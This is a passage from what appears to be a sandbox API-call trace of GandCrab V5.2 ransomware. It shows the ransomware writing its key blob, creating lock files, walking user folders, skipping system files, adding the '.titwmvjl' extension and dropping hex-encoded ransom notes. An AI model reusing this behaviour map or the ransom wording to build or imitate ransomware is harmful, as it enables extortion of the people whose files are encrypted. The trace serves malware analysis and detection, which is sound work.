2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.362] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0096.363] CloseHandle (hObject=0x2ac) returned 1 [0096.363] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.363] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.363] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2a4)) [0096.363] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.363] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.364] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.364] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\d2ca4a09d2ca4deb61a.lock") returned 61 [0096.364] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\documents\\my videos\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0096.365] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.365] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.365] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0096.365] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*") returned="C:\\Users\\Default\\Documents\\My Videos\\*" [0096.366] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0096.366] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0096.366] CloseHandle (hObject=0x2ac) returned 1 [0096.366] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.366] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.366] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.366] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt" [0096.366] lstrlenW (lpString=".titwmvjl") returned 9 [0096.366] lstrlenW (lpString="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt") returned 47 [0096.366] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.366] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 56 [0096.366] lstrlenW (lpString="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt") returned 47 [0096.366] lstrlenW (lpString=".txt") returned 4 [0096.366] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.367] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.367] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.367] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.367] lstrlenW (lpString="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt") returned 47 [0096.367] lstrlenW (lpString="C:\\Users\\Default\\Documents\\TITWMVJL-DECRYPT.txt") returned 47 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.367] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.367] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.367] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.367] FindClose (in: hFindFile=0x503678 | out: hFindFile=0x503678) returned 1 [0096.368] CloseHandle (hObject=0x230) returned 1 [0096.368] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.368] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0096.368] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0096.368] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0096.368] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0096.368] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.369] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.370] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.370] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Downloads\\\\TITWMVJL-DECRYPT.txt") returned 48 [0096.370] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\downloads\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.371] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\